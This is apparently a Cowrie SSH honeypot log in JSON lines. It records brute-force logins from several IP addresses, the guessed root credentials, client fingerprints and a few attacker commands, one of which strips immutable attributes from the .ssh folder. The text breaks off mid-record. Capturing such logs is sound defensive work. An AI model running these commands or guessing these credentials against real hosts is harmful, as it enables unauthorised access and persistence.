{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:06:50.737784Z","src_ip":"106.12.128.104","session":"8e9268c8b778"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:06:56.321223Z","src_ip":"106.12.128.104","session":"8e9268c8b778"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":48594,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5f0073c901b","protocol":"ssh","message":"New connection: 139.19.117.131:48594 (1.2.3.4:22) [session: b5f0073c901b]","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.559283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.560177Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.577929Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.617913Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.618553Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.636972Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T23:07:13.639366Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:07:23.559618Z","src_ip":"139.19.117.131","session":"b5f0073c901b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60894,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d8eb6b576e7","protocol":"ssh","message":"New connection: 217.72.205.35:60894 (1.2.3.4:22) [session: 6d8eb6b576e7]","sensor":"my-vps","timestamp":"2025-08-26T23:07:41.997077Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:07:41.998174Z","src_ip":"217.72.205.35","session":"6d8eb6b576e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1381,"dst_ip":"1.2.3.4","dst_port":22,"session":"488e2eed861a","protocol":"ssh","message":"New connection: 212.227.235.229:1381 (1.2.3.4:22) [session: 488e2eed861a]","sensor":"my-vps","timestamp":"2025-08-26T23:07:55.591524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:07:55.603647Z","src_ip":"212.227.235.229","session":"488e2eed861a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:07:55.732645Z","src_ip":"212.227.235.229","session":"488e2eed861a"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T23:07:56.296975Z","src_ip":"212.227.235.229","session":"488e2eed861a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:07:57.439999Z","src_ip":"212.227.235.229","session":"488e2eed861a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52762,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecfbf3d99f93","protocol":"ssh","message":"New connection: 212.227.235.229:52762 (1.2.3.4:22) [session: ecfbf3d99f93]","sensor":"my-vps","timestamp":"2025-08-26T23:08:11.597040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:08:12.784055Z","src_ip":"212.227.235.229","session":"ecfbf3d99f93"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:08:12.784708Z","src_ip":"212.227.235.229","session":"ecfbf3d99f93"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"654321","message":"login attempt [odoo/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:08:16.456210Z","src_ip":"212.227.235.229","session":"ecfbf3d99f93"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:08:19.096486Z","src_ip":"212.227.235.229","session":"ecfbf3d99f93"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":36008,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a71f3f08798","protocol":"ssh","message":"New connection: 106.12.128.104:36008 (1.2.3.4:22) [session: 8a71f3f08798]","sensor":"my-vps","timestamp":"2025-08-26T23:08:51.501444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:08:51.502375Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:08:51.699214Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123456..","message":"login attempt [root/abc123456..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:08:53.687676Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:08:55.004271Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:08:55.005149Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:08:55.006496Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:08:55.837317Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":56641,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3865e29095f","protocol":"ssh","message":"New connection: 213.108.243.7:56641 (1.2.3.4:22) [session: f3865e29095f]","sensor":"my-vps","timestamp":"2025-08-26T23:09:32.381708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:09:32.382617Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:09:32.488264Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45t","message":"login attempt [root/1qw23er45t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:09:32.791898Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:09:33.070785Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T23:09:33.071479Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:09:33.170845Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:09:33.171854Z","src_ip":"213.108.243.7","session":"f3865e29095f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42882,"dst_ip":"1.2.3.4","dst_port":22,"session":"f88f001b3689","protocol":"ssh","message":"New connection: 213.209.150.239:42882 (1.2.3.4:22) [session: f88f001b3689]","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.177319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.178558Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"l